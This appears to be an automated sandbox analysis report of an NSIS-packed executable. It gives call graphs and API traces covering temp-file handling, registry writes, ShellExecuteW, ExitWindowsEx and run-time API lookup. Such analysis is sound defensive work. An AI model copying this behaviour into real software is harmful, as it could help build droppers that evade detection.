402bed 4441->4444 4442 402b7a 3 API calls 4442->4443 4443->4438 4443->4439 4443->4440 4443->4442 4445 402c1d RegDeleteKeyW 4444->4445 4444->4446 4445->4446 4446->4436 4454 403c57 4455 403daa 4454->4455 4456 403c6f 4454->4456 4458 403dfb 4455->4458 4459 403dbb GetDlgItem GetDlgItem 4455->4459 4456->4455 4457 403c7b 4456->4457 4460 403c86 SetWindowPos 4457->4460 4461 403c99 4457->4461 4463 403e55 4458->4463 4468 401389 2 API calls 4458->4468 4462 40412f 19 API calls 4459->4462 4460->4461 4465 403cb6 4461->4465 4466 403c9e ShowWindow 4461->4466 4467 403de5 SetClassLongW 4462->4467 4464 40417b SendMessageW 4463->4464 4486 403da5 4463->4486 4493 403e67 4464->4493 4469 403cd8 4465->4469 4470 403cbe DestroyWindow 4465->4470 4466->4465 4471 40140b 2 API calls 4467->4471 4472 403e2d 4468->4472 4474 403cdd SetWindowLongW 4469->4474 4475 403cee 4469->4475 4473 4040d9 4470->4473 4471->4458 4472->4463 4478 403e31 SendMessageW 
4472->4478 4484 4040e9 ShowWindow 4473->4484 4473->4486 4474->4486 4476 403d97 4475->4476 4477 403cfa GetDlgItem 4475->4477 4483 404196 8 API calls 4476->4483 4481 403d2a 4477->4481 4482 403d0d SendMessageW IsWindowEnabled 4477->4482 4478->4486 4479 40140b 2 API calls 4479->4493 4480 4040ba DestroyWindow EndDialog 4480->4473 4485 403d2f 4481->4485 4488 403d37 4481->4488 4489 403d7e SendMessageW 4481->4489 4490 403d4a 4481->4490 4482->4481 4482->4486 4483->4486 4484->4486 4528 404108 4485->4528 4487 405f0c 18 API calls 4487->4493 4488->4485 4488->4489 4489->4476 4494 403d52 4490->4494 4495 403d67 4490->4495 4492 40412f 19 API calls 4492->4493 4493->4479 4493->4480 4493->4486 4493->4487 4493->4492 4500 40412f 19 API calls 4493->4500 4515 403ffa DestroyWindow 4493->4515 4498 40140b 2 API calls 4494->4498 4497 40140b 2 API calls 4495->4497 4496 403d65 4496->4476 4499 403d6e 4497->4499 4498->4485 4499->4476 4499->4485 4501 403ee2 GetDlgItem 4500->4501 4502 403ef7 4501->4502 4503 403eff ShowWindow KiUserCallbackDispatcher 4501->4503 4502->4503 4525 404151 EnableWindow 4503->4525 4505 403f29 EnableWindow 4508 403f3d 4505->4508 4506 403f42 GetSystemMenu EnableMenuItem SendMessageW 4507 403f72 SendMessageW 4506->4507 4506->4508 4507->4508 4508->4506 4526 404164 SendMessageW 4508->4526 4527 405eea lstrcpynW 4508->4527 4511 403fa0 lstrlenW 4512 405f0c 18 API calls 4511->4512 4513 403fb6 SetWindowTextW 4512->4513 4514 401389 2 API calls 4513->4514 4514->4493 4515->4473 4516 404014 CreateDialogParamW 4515->4516 4516->4473 4517 404047 4516->4517 4518 40412f 19 API calls 4517->4518 4519 404052 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4518->4519 4520 401389 2 API calls 4519->4520 4521 404098 4520->4521 4521->4486 4522 4040a0 ShowWindow 4521->4522 4523 40417b SendMessageW 4522->4523 4524 4040b8 4523->4524 4524->4473 4525->4505 4526->4508 4527->4511 4529 404115 SendMessageW 4528->4529 4530 40410f 4528->4530 4529->4496 4530->4529 4531 4014d7 4532 402b1d 18 API calls 
4531->4532 4533 4014dd Sleep 4532->4533 4535 4029c7 4533->4535 4752 40335a #17 SetErrorMode OleInitialize 4753 406254 3 API calls 4752->4753 4754 40339d SHGetFileInfoW 4753->4754 4825 405eea lstrcpynW 4754->4825 4756 4033c8 GetCommandLineW 4826 405eea lstrcpynW 4756->4826 4758 4033da GetModuleHandleW 4759 4033f2 4758->4759 4760 405962 CharNextW 4759->4760 4761 403401 CharNextW 4760->4761 4769 403411 4761->4769 4762 4034e6 4763 4034fa GetTempPathW 4762->4763 4827 403326 4763->4827 4765 403512 4766 403516 GetWindowsDirectoryW lstrcatW 4765->4766 4767 40356c DeleteFileW 4765->4767 4770 403326 11 API calls 4766->4770 4835 402dbc GetTickCount GetModuleFileNameW 4767->4835 4768 405962 CharNextW 4768->4769 4769->4762 4769->4768 4775 4034e8 4769->4775 4772 403532 4770->4772 4772->4767 4774 403536 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4772->4774 4773 403580 4776 403618 4773->4776 4779 403608 4773->4779 4783 405962 CharNextW 4773->4783 4778 403326 11 API calls 4774->4778 4919 405eea lstrcpynW 4775->4919 4922 4037c2 4776->4922 4782 403564 4778->4782 4865 4038b4 4779->4865 4782->4767 4782->4776 4787 40359b 4783->4787 4785 403631 4788 4056c6 MessageBoxIndirectW 4785->4788 4786 403727 4789 4037aa ExitProcess 4786->4789 4794 406254 3 API calls 4786->4794 4792 4035e2 4787->4792 4793 403647 lstrcatW lstrcmpiW 4787->4793 4791 40363f ExitProcess 4788->4791 4795 405a3d 18 API calls 4792->4795 4793->4776 4796 403663 CreateDirectoryW SetCurrentDirectoryW 4793->4796 4797 403736 4794->4797 4799 4035ee 4795->4799 4800 403686 4796->4800 4801 40367b 4796->4801 4798 406254 3 API calls 4797->4798 4802 40373f 4798->4802 4799->4776 4920 405eea lstrcpynW 4799->4920 4932 405eea lstrcpynW 4800->4932 4931 405eea lstrcpynW 4801->4931 4805 406254 3 API calls 4802->4805 4807 403748 4805->4807 4809 403796 ExitWindowsEx 4807->4809 4814 403756 GetCurrentProcess 4807->4814 4808 4035fd 4921 405eea lstrcpynW 4808->4921 4809->4789 4812 4037a3 4809->4812 4811 405f0c 18 API calls 
4813 4036c5 DeleteFileW 4811->4813 4815 40140b 2 API calls 4812->4815 4816 4036d2 CopyFileW 4813->4816 4822 403694 4813->4822 4819 403766 4814->4819 4815->4789 4816->4822 4817 40371b 4820 405d84 40 API calls 4817->4820 4818 405d84 40 API calls 4818->4822 4819->4809 4820->4776 4821 405f0c 18 API calls 4821->4822 4822->4811 4822->4817 4822->4818 4822->4821 4823 405665 2 API calls 4822->4823 4824 403706 CloseHandle 4822->4824 4823->4822 4824->4822 4825->4756 4826->4758 4828 40617e 5 API calls 4827->4828 4830 403332 4828->4830 4829 40333c 4829->4765 4830->4829 4831 405935 3 API calls 4830->4831 4832 403344 CreateDirectoryW 4831->4832 4933 405b85 4832->4933 4937 405b56 GetFileAttributesW CreateFileW 4835->4937 4837 402dff 4864 402e0c 4837->4864 4938 405eea lstrcpynW 4837->4938 4839 402e22 4840 405981 2 API calls 4839->4840 4841 402e28 4840->4841 4939 405eea lstrcpynW 4841->4939 4843 402e33 GetFileSize 4844 402f34 4843->4844 4862 402e4a 4843->4862 4845 402d1a 33 API calls 4844->4845 4846 402f3b 4845->4846 4848 402f77 GlobalAlloc 4846->4848 4846->4864 4941 40330f SetFilePointer 4846->4941 4847 4032f9 ReadFile 4847->4862 4852 402f8e 4848->4852 4849 402fcf 4850 402d1a 33 API calls 4849->4850 4850->4864 4854 405b85 2 API calls 4852->4854 4853 402f58 4855 4032f9 ReadFile 4853->4855 4857 402f9f CreateFileW 4854->4857 4858 402f63 4855->4858 4856 402d1a 33 API calls 4856->4862 4859 402fd9 4857->4859 4857->4864 4858->4848 4858->4864 4940 40330f SetFilePointer 4859->4940 4861 402fe7 4863 403062 46 API calls 4861->4863 4862->4844 4862->4847 4862->4849 4862->4856 4862->4864 4863->4864 4864->4773 4866 406254 3 API calls 4865->4866 4867 4038c8 4866->4867 4868 4038e0 4867->4868 4869 4038ce 4867->4869 4870 405db7 3 API calls 4868->4870 4951 405e31 wsprintfW 4869->4951 4871 403910 4870->4871 4873 40392f lstrcatW 4871->4873 4875 405db7 3 API calls 4871->4875 4874 4038de 4873->4874 4942 403b8a 4874->4942 4875->4873 4878 405a3d 18 API calls 4879 403961 4878->4879 4880 4039f5 4879->4880 4883 
405db7 3 API calls 4879->4883 4881 405a3d 18 API calls 4880->4881 4882 4039fb 4881->4882 4885 403a0b LoadImageW 4882->4885 4886 405f0c 18 API calls 4882->4886 4884 403993 4883->4884 4884->4880 4889 4039b4 lstrlenW 4884->4889 4893 405962 CharNextW 4884->4893 4887 403ab1 4885->4887 4888 403a32 RegisterClassW 4885->4888 4886->4885 4892 40140b 2 API calls 4887->4892 4890 403abb 4888->4890 4891 403a68 SystemParametersInfoW CreateWindowExW 4888->4891 4894 4039c2 lstrcmpiW 4889->4894 4895 4039e8 4889->4895 4890->4776 4891->4887 4896 403ab7 4892->4896 4897 4039b1 4893->4897 4894->4895 4898 4039d2 GetFileAttributesW 4894->4898 4899 405935 3 API calls 4895->4899 4896->4890 4901 403b8a 19 API calls 4896->4901 4897->4889 4900 4039de 4898->4900 4902 4039ee 4899->4902 4900->4895 4903 405981 2 API calls 4900->4903 4904 403ac8 4901->4904 4952 405eea lstrcpynW 4902->4952 4903->4895 4906 403ad4 ShowWindow LoadLibraryW 4904->4906 4907 403b57 4904->4907 4909 403af3 LoadLibraryW 4906->4909 4910 403afa GetClassInfoW 4906->4910 4953 405267 OleInitialize 4907->4953 4909->4910 4911 403b24 DialogBoxParamW 4910->4911 4912 403b0e GetClassInfoW RegisterClassW 4910->4912 4914 40140b 2 API calls 4911->4914 4912->4911 4913 403b5d 4915 403b61 4913->4915 4916 403b79 4913->4916 4914->4890 4915->4890 4918 40140b 2 API calls 4915->4918 4917 40140b 2 API calls 4916->4917 4917->4890 4918->4890 4919->4763 4920->4808 4921->4779 4923 4037d3 CloseHandle 4922->4923 4924 4037dd 4922->4924 4923->4924 4925 4037f1 4924->4925 4926 4037e7 CloseHandle 4924->4926 4961 40381f 4925->4961 4926->4925 4929 405772 71 API calls 4930 403621 OleUninitialize 4929->4930 4930->4785 4930->4786 4931->4800 4932->4822 4934 405b92 GetTickCount GetTempFileNameW 4933->4934 4935 405bc8 4934->4935 4936 403358 4934->4936 4935->4934 4935->4936 4936->4765 4937->4837 4938->4839 4939->4843 4940->4861 4941->4853 4943 403b9e 4942->4943 4960 405e31 wsprintfW 4943->4960 4945 403c0f 4946 405f0c 18 API calls 4945->4946 4947 403c1b SetWindowTextW 
4946->4947 4948 40393f 4947->4948 4949 403c37 4947->4949 4948->4878 4949->4948 4950 405f0c 18 API calls 4949->4950 4950->4949 4951->4874 4952->4880 4954 40417b SendMessageW 4953->4954 4955 40528a 4954->4955 4958 401389 2 API calls 4955->4958 4959 4052b1 4955->4959 4956 40417b SendMessageW 4957 4052c3 OleUninitialize 4956->4957 4957->4913 4958->4955 4959->4956 4960->4945 4962 40382d 4961->4962 4963 4037f6 4962->4963 4964 403832 FreeLibrary GlobalFree 4962->4964 4963->4929 4964->4963 4964->4964 5233 40155b 5234 40296d 5233->5234 5237 405e31 wsprintfW 5234->5237 5236 402972 5237->5236 3902 4023e0 3913 402c44 3902->3913 3904 4023ea 3917 402b3a 3904->3917 3907 4023fe RegQueryValueExW 3908 402424 RegCloseKey 3907->3908 3909 40241e 3907->3909 3912 402793 3908->3912 3909->3908 3923 405e31 wsprintfW 3909->3923 3914 402b3a 18 API calls 3913->3914 3915 402c5d 3914->3915 3916 402c6b RegOpenKeyExW 3915->3916 3916->3904 3918 402b46 3917->3918 3924 405f0c 3918->3924 3921 4023f3 3921->3907 3921->3912 3923->3908 3925 405f19 3924->3925 3926 406164 3925->3926 3929 405fcc GetVersion 3925->3929 3930 406132 lstrlenW 3925->3930 3932 405f0c 10 API calls 3925->3932 3935 406047 GetSystemDirectoryW 3925->3935 3936 40605a GetWindowsDirectoryW 3925->3936 3937 40617e 5 API calls 3925->3937 3938 405f0c 10 API calls 3925->3938 3939 4060d3 lstrcatW 3925->3939 3940 40608e SHGetSpecialFolderLocation 3925->3940 3951 405db7 RegOpenKeyExW 3925->3951 3956 405e31 wsprintfW 3925->3956 3957 405eea lstrcpynW 3925->3957 3927 402b67 3926->3927 3958 405eea lstrcpynW 3926->3958 3927->3921 3942 40617e 3927->3942 3929->3925 3930->3925 3932->3930 3935->3925 3936->3925 3937->3925 3938->3925 3939->3925 3940->3925 3941 4060a6 SHGetPathFromIDListW CoTaskMemFree 3940->3941 3941->3925 3943 40618b 3942->3943 3945 4061f4 CharNextW 3943->3945 3947 406201 3943->3947 3949 4061e0 CharNextW 3943->3949 3950 4061ef CharNextW 3943->3950 3959 405962 3943->3959 3944 406206 CharPrevW 3944->3947 3945->3943 3945->3947 3947->3944 3948 
406227 3947->3948 3948->3921 3949->3943 3950->3945 3952 405e2b 3951->3952 3953 405deb RegQueryValueExW 3951->3953 3952->3925 3954 405e0c RegCloseKey 3953->3954 3954->3952 3956->3925 3957->3925 3958->3927 3960 405968 3959->3960 3961 40597e 3960->3961 3962 40596f CharNextW 3960->3962 3961->3943 3962->3960 5245 401ce5 GetDlgItem GetClientRect 5246 402b3a 18 API calls 5245->5246 5247 401d17 LoadImageW SendMessageW 5246->5247 5248 401d35 DeleteObject 5247->5248 5249 4029c7 5247->5249 5248->5249 5250 401de8 EnableWindow 5251 4029c7 5250->5251 5252 40206a 5253 402b3a 18 API calls 5252->5253 5254 402071 5253->5254 5255 402b3a 18 API calls 5254->5255 5256 40207b 5255->5256 5257 402b3a 18 API calls 5256->5257 5258 402084 5257->5258 5259 402b3a 18 API calls 5258->5259 5260 40208e 5259->5260 5261 402b3a 18 API calls 5260->5261 5262 402098 5261->5262 5263 4020ac CoCreateInstance 5262->5263 5264 402b3a 18 API calls 5262->5264 5267 4020cb 5263->5267 5264->5263 5265 401423 25 API calls 5266 402197 5265->5266 5267->5265 5267->5266 5268 40156b 5269 401584 5268->5269 5270 40157b ShowWindow 5268->5270 5271 401592 ShowWindow 5269->5271 5272 4029c7 5269->5272 5270->5269 5271->5272 5273 4024ee 5274 4024f3 5273->5274 5275 40250c 5273->5275 5276 402b1d 18 API calls 5274->5276 5277 402512 5275->5277 5278 40253e 5275->5278 5281 4024fa 5276->5281 5279 402b3a 18 API calls 5277->5279 5280 402b3a 18 API calls 5278->5280 5282 402519 WideCharToMultiByte lstrlenA 5279->5282 5283 402545 lstrlenW 5280->5283 5284 402567 WriteFile 5281->5284 5285 402793 5281->5285 5282->5281 5283->5281 5284->5285 5286 4018ef 5287 401926 5286->5287 5288 402b3a 18 API calls 5287->5288 5289 40192b 5288->5289 5290 405772 71 API calls 5289->5290 5291 401934 5290->5291 5292 402770 5293 402b3a 18 API calls 5292->5293 5294 402777 FindFirstFileW 5293->5294 5295 40278a 5294->5295 5296 40279f 5294->5296 5297 4027a8 5296->5297 5300 405e31 wsprintfW 5296->5300 5301 405eea lstrcpynW 5297->5301 5300->5297 5301->5295 5302 4014f1 
SetForegroundWindow 5303 4029c7 5302->5303 5304 403872 5305 40387d 5304->5305 5306 403881 5305->5306 5307 403884 GlobalAlloc 5305->5307 5307->5306 5308 4018f2 5309 402b3a 18 API calls 5308->5309 5310 4018f9 5309->5310 5311 4056c6 MessageBoxIndirectW 5310->5311 5312 401902 5311->5312 5313 402573 5314 402b1d 18 API calls 5313->5314 5316 402582 5314->5316 5315 4026a0 5316->5315 5317 4025c8 ReadFile 5316->5317 5318 405bd9 ReadFile 5316->5318 5319 4026a2 5316->5319 5320 402608 MultiByteToWideChar 5316->5320 5322 4026b3 5316->5322 5323 40262e SetFilePointer MultiByteToWideChar 5316->5323 5317->5315 5317->5316 5318->5316 5325 405e31 wsprintfW 5319->5325 5320->5316 5322->5315 5324 4026d4 SetFilePointer 5322->5324 5323->5316 5324->5315 5325->5315 5326 401df3 5327 402b3a 18 API calls 5326->5327 5328 401df9 5327->5328 5329 402b3a 18 API calls 5328->5329 5330 401e02 5329->5330 5331 402b3a 18 API calls 5330->5331 5332 401e0b 5331->5332 5333 402b3a 18 API calls 5332->5333 5334 401e14 5333->5334 5335 401423 25 API calls 5334->5335 5336 401e1b ShellExecuteW 5335->5336 5337 401e4c 5336->5337 5357 4026f9 5358 402700 5357->5358 5361 402972 5357->5361 5359 402b1d 18 API calls 5358->5359 5360 40270b 5359->5360 5362 402712 SetFilePointer 5360->5362 5362->5361 5363 402722 5362->5363 5365 405e31 wsprintfW 5363->5365 5365->5361 5373 1000103d 5374 1000101b 8 API calls 5373->5374 5375 10001056 5374->5375 5376 40427d lstrlenW 5377 40429c 5376->5377 5378 40429e WideCharToMultiByte 5376->5378 5377->5378 5379 402c7f 5380 402c91 SetTimer 5379->5380 5381 402caa 5379->5381 5380->5381 5382 402cf8 5381->5382 5383 402cfe MulDiv 5381->5383 5384 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5383->5384 5384->5382 5386 4014ff 5387 401507 5386->5387 5389 40151a 5386->5389 5388 402b1d 18 API calls 5387->5388 5388->5389 5390 401000 5391 401037 BeginPaint GetClientRect 5390->5391 5394 40100c DefWindowProcW 5390->5394 5392 4010f3 5391->5392 5396 401073 CreateBrushIndirect FillRect DeleteObject 5392->5396 
5397 4010fc 5392->5397 5395 401179 5394->5395 5396->5392 5398 401102 CreateFontIndirectW 5397->5398 5399 401167 EndPaint 5397->5399 5398->5399 5400 401112 6 API calls 5398->5400 5399->5395 5400->5399 5401 401a00 5402 402b3a 18 API calls 5401->5402 5403 401a09 ExpandEnvironmentStringsW 5402->5403 5404 401a30 5403->5404 5405 401a1d 5403->5405 5405->5404 5406 401a22 lstrcmpW 5405->5406 5406->5404 5407 401b01 5408 402b3a 18 API calls 5407->5408 5409 401b08 5408->5409 5410 402b1d 18 API calls 5409->5410 5411 401b11 wsprintfW 5410->5411 5412 4029c7 5411->5412 5413 100018c1 5414 10001243 3 API calls 5413->5414 5415 100018e7 5414->5415 5416 10001243 3 API calls 5415->5416 5417 100018ef 5416->5417 5418 10001243 3 API calls 5417->5418 5420 10001931 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5417->5420 5419 10001916 5418->5419 5421 1000191f GlobalFree 5419->5421 5422 10001280 2 API calls 5420->5422 5421->5420 5423 10001aad GlobalFree GlobalFree 5422->5423 5424 10002a43 5425 10002a5b 5424->5425 5426 100015a7 2 API calls 5425->5426 5427 10002a76 5426->5427 5428 404583 5429 404593 5428->5429 5430 4045b9 5428->5430 5431 40412f 19 API calls 5429->5431 5432 404196 8 API calls 5430->5432 5433 4045a0 SetDlgItemTextW 5431->5433 5434 4045c5 5432->5434 5433->5430 4133 405108 4134 405118 4133->4134 4135 40512c 4133->4135 4137 405175 4134->4137 4138 40511e 4134->4138 4136 405134 IsWindowVisible 4135->4136 4141 405154 4135->4141 4136->4137 4140 405141 4136->4140 4142 40517a CallWindowProcW 4137->4142 4147 40417b 4138->4147 4150 404a5e SendMessageW 4140->4150 4141->4142 4155 404ade 4141->4155 4143 405128 4142->4143 4148 404193 4147->4148 4149 404184 SendMessageW 4147->4149 4148->4143 4149->4148 4151 404a81 GetMessagePos ScreenToClient SendMessageW 4150->4151 4152 404abd SendMessageW 4150->4152 4153 404ab5 4151->4153 4154 404aba 4151->4154 4152->4153 4153->4141 4154->4152 4164 405eea lstrcpynW 4155->4164 4157 404af1 4165 405e31 wsprintfW 4157->4165 4159 404afb 4166 40140b 
4159->4166 4163 404b0b 4163->4137 4164->4157 4165->4159 4170 401389 4166->4170 4169 405eea lstrcpynW 4169->4163 4172 401390 4170->4172 4171 4013fe 4171->4169 4172->4171 4173 4013cb MulDiv SendMessageW 4172->4173 4173->4172 5435 401f08 5436 402b3a 18 API calls 5435->5436 5437 401f0f GetFileVersionInfoSizeW 5436->5437 5438 401f36 GlobalAlloc 5437->5438 5439 401f8c 5437->5439 5438->5439 5440 401f4a GetFileVersionInfoW 5438->5440 5440->5439 5441 401f59 VerQueryValueW 5440->5441 5441->5439 5442 401f72 5441->5442 5446 405e31 wsprintfW 5442->5446 5444 401f7e 5447 405e31 wsprintfW 5444->5447 5446->5444 5447->5439 5455 1000224c 5456 100022b1 5455->5456 5457 100022e7 5455->5457 5456->5457 5458 100022c3 GlobalAlloc 5456->5458 5458->5456 5459 100016ce 5460 100016fd 5459->5460 5461 10001b3e 24 API calls 5460->5461 5462 10001704 5461->5462 5463 10001717 5462->5463 5464 1000170b 5462->5464 5466 10001721 5463->5466 5467 1000173e 5463->5467 5465 10001280 2 API calls 5464->5465 5470 10001715 5465->5470 5471 10001555 3 API calls 5466->5471 5468 10001744 5467->5468 5469 10001768 5467->5469 5472 100015cc 3 API calls 5468->5472 5473 10001555 3 API calls 5469->5473 5474 10001726 5471->5474 5475 10001749 5472->5475 5473->5470 5476 100015cc 3 API calls 5474->5476 5478 10001280 2 API calls 5475->5478 5477 1000172c 5476->5477 5479 10001280 2 API calls 5477->5479 5480 1000174f GlobalFree 5478->5480 5481 10001732 GlobalFree 5479->5481 5480->5470 5482 10001763 GlobalFree 5480->5482 5481->5470 5482->5470 4177 404b10 GetDlgItem GetDlgItem 4178 404b62 7 API calls 4177->4178 4181 404d7b 4177->4181 4179 404c05 DeleteObject 4178->4179 4180 404bf8 SendMessageW 4178->4180 4182 404c0e 4179->4182 4180->4179 4190 404e5f 4181->4190 4191 404e40 4181->4191 4195 404ddb 4181->4195 4183 404c45 4182->4183 4184 404c1d 4182->4184 4233 40412f 4183->4233 4187 405f0c 18 API calls 4184->4187 4186 404f0b 4192 404f15 SendMessageW 4186->4192 4193 404f1d 4186->4193 4194 404c27 SendMessageW SendMessageW 4187->4194 4188 
404c59 4197 40412f 19 API calls 4188->4197 4189 4050f3 4246 404196 4189->4246 4190->4186 4190->4189 4198 404eb8 SendMessageW 4190->4198 4191->4190 4200 404e51 SendMessageW 4191->4200 4192->4193 4201 404f36 4193->4201 4202 404f2f ImageList_Destroy 4193->4202 4209 404f46 4193->4209 4194->4182 4196 404a5e 5 API calls 4195->4196 4214 404dec 4196->4214 4215 404c67 4197->4215 4198->4189 4204 404ecd SendMessageW 4198->4204 4200->4190 4206 404f3f GlobalFree 4201->4206 4201->4209 4202->4201 4203 4050b5 4203->4189 4210 4050c7 ShowWindow GetDlgItem ShowWindow 4203->4210 4208 404ee0 4204->4208 4206->4209 4207 404d3c GetWindowLongW SetWindowLongW 4211 404d55 4207->4211 4219 404ef1 SendMessageW 4208->4219 4209->4203 4223 404ade 4 API calls 4209->4223 4227 404f81 4209->4227 4210->4189 4212 404d73 4211->4212 4213 404d5b ShowWindow 4211->4213 4237 404164 SendMessageW 4212->4237 4236 404164 SendMessageW 4213->4236 4214->4191 4215->4207 4218 404cb7 SendMessageW 4215->4218 4220 404d36 4215->4220 4221 404cf3 SendMessageW 4215->4221 4222 404d04 SendMessageW 4215->4222 4218->4215 4219->4186 4220->4207 4220->4211 4221->4215 4222->4215 4223->4227 4224 404d6e 4224->4189 4225 40508b InvalidateRect 4225->4203 4226 4050a1 4225->4226 4238 404978 4226->4238 4228 404faf SendMessageW 4227->4228 4229 404fc5 4227->4229 4228->4229 4229->4225 4231 405026 4229->4231 4232 405039 SendMessageW SendMessageW 4229->4232 4231->4232 4232->4229 4234 405f0c 18 API calls 4233->4234 4235 40413a SetDlgItemTextW 4234->4235 4235->4188 4236->4224 4237->4181 4239 404995 4238->4239 4240 405f0c 18 API calls 4239->4240 4241 4049ca 4240->4241 4242 405f0c 18 API calls 4241->4242 4243 4049d5 4242->4243 4244 405f0c 18 API calls 4243->4244 4245 404a06 lstrlenW wsprintfW SetDlgItemTextW 4244->4245 4245->4203 4247 4041ae GetWindowLongW 4246->4247 4257 404237 4246->4257 4248 4041bf 4247->4248 4247->4257 4249 4041d1 4248->4249 4250 4041ce GetSysColor 4248->4250 4251 4041e1 SetBkMode 4249->4251 4252 4041d7 SetTextColor 4249->4252 
4250->4249 4253 4041f9 GetSysColor 4251->4253 4254 4041ff 4251->4254 4252->4251 4253->4254 4255 404210 4254->4255 4256 404206 SetBkColor 4254->4256 4255->4257 4258 404223 DeleteObject 4255->4258 4259 40422a CreateBrushIndirect 4255->4259 4256->4255 4258->4259 4259->4257 5483 401491 5484 405194 25 API calls 5483->5484 5485 401498 5484->5485 5486 404912 5487 404922 5486->5487 5488 40493e 5486->5488 5497 4056aa GetDlgItemTextW 5487->5497 5490 404971 5488->5490 5491 404944 SHGetPathFromIDListW 5488->5491 5493 40495b SendMessageW 5491->5493 5494 404954 5491->5494 5492 40492f SendMessageW 5492->5488 5493->5490 5495 40140b 2 API calls 5494->5495 5495->5493 5497->5492 4447 402295 4448 402b3a 18 API calls 4447->4448 4449 4022a4 4448->4449 4450 402b3a 18 API calls 4449->4450 4451 4022ad 4450->4451 4452 402b3a 18 API calls 4451->4452 4453 4022b7 GetPrivateProfileStringW 4452->4453 4536 401f98 4537 40205c 4536->4537 4538 401faa 4536->4538 4541 401423 25 API calls 4537->4541 4539 402b3a 18 API calls 4538->4539 4540 401fb1 4539->4540 4542 402b3a 18 API calls 4540->4542 4547 402197 4541->4547 4543 401fba 4542->4543 4544 401fd0 LoadLibraryExW 4543->4544 4545 401fc2 GetModuleHandleW 4543->4545 4544->4537 4546 401fe1 4544->4546 4545->4544 4545->4546 4559 4062c0 WideCharToMultiByte 4546->4559 4550 401ff2 4553 402011 4550->4553 4554 401ffa 4550->4554 4551 40202b 4552 405194 25 API calls 4551->4552 4555 402002 4552->4555 4562 10001771 4553->4562 4604 401423 4554->4604 4555->4547 4557 40204e FreeLibrary 4555->4557 4557->4547 4560 4062ea GetProcAddress 4559->4560 4561 401fec 4559->4561 4560->4561 4561->4550 4561->4551 4563 100017a1 4562->4563 4607 10001b3e 4563->4607 4565 100017a8 4566 100018be 4565->4566 4567 100017c0 4565->4567 4568 100017b9 4565->4568 4566->4555 4641 100022eb 4567->4641 4659 100022a1 4568->4659 4573 10001824 4577 10001866 4573->4577 4578 1000182a 4573->4578 4574 10001806 4672 1000248d 4574->4672 4575 100017d6 4580 100017dc 4575->4580 4581 100017e7 4575->4581 4576 
Execution graph (interactive call-graph figure in the original report): nodes are functions of the NSIS stub image (0x00401xxx to 0x00406xxx) and of a second module whose code lies at 0x10001xxx to 0x10002xxx; edges give caller → callee with the Windows APIs reached along the way. The stub side covers file and directory handling (FindFirstFileW/FindNextFileW/FindClose, GetFileAttributesW/SetFileAttributesW, DeleteFileW, RemoveDirectoryW, CreateDirectoryW, SetCurrentDirectoryW, SearchPathW, GetFullPathNameW/GetShortPathNameW, CreateFileW, ReadFile/WriteFile/SetFilePointer/GetFileSize, SHFileOperationW), registry writes (RegCreateKeyExW/RegSetValueExW/RegCloseKey), UI (CreateDialogParamW, ShowWindow, SendMessageW, InvalidateRect, MessageBoxIndirectW, PostQuitMessage, DestroyWindow, MulDiv) and lstrcpyW/lstrcpynW/lstrcatW/lstrlenW string helpers. The second module is dominated by GlobalAlloc/GlobalFree/GlobalSize buffer management, WideCharToMultiByte/MultiByteToWideChar, CLSIDFromString/StringFromGUID2, wsprintfW, VirtualAlloc/VirtualFree, and a helper at 0x10001617 that converts a wide string to ANSI and resolves it with GetProcAddress after GetModuleHandleW/LoadLibraryW, i.e. run-time API resolution by name.

Control-flow Graph

Legend: • Executed • Not Executed

Function 0040335A (NSIS stub entry point; basic-block graph rendered as a figure in the original report). Along the executed path the blocks call #17 (COMCTL32), SetErrorMode, OleInitialize, a LoadLibraryA/GetProcAddress helper (00406254), SHGetFileInfoW, GetCommandLineW, GetModuleHandleW, CharNextW, GetTempPathW, GetWindowsDirectoryW, lstrcatW, SetEnvironmentVariableW (twice), DeleteFileW, OleUninitialize, lstrcmpiW, CreateDirectoryW, SetCurrentDirectoryW, CopyFileW, CloseHandle, GetCurrentProcess, ExitWindowsEx and ExitProcess; non-executed blocks hold the error paths (MessageBoxIndirectW via 004056C6, then ExitProcess). The per-call arguments are listed under APIs below.
APIs
• #17.COMCTL32 ref: 00403379
• SetErrorMode.KERNELBASE(00008001), ref: 00403384
• OleInitialize.OLE32(00000000), ref: 0040338B
  • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
  • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
  • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
• SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B3
  • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
• GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C8
• GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\________.exe",00000000), ref: 004033DB
• CharNextW.USER32(00000000,"C:\Users\user\Desktop\________.exe",00000020), ref: 00403402
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040350B
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351C
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403528
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353C
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403544
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403555
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355D
• DeleteFileW.KERNELBASE(1033), ref: 00403571
• OleUninitialize.OLE32(?), ref: 00403621
• ExitProcess.KERNEL32 ref: 00403641
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\________.exe",00000000,?), ref: 0040364D
• lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\________.exe",00000000,?), ref: 00403659
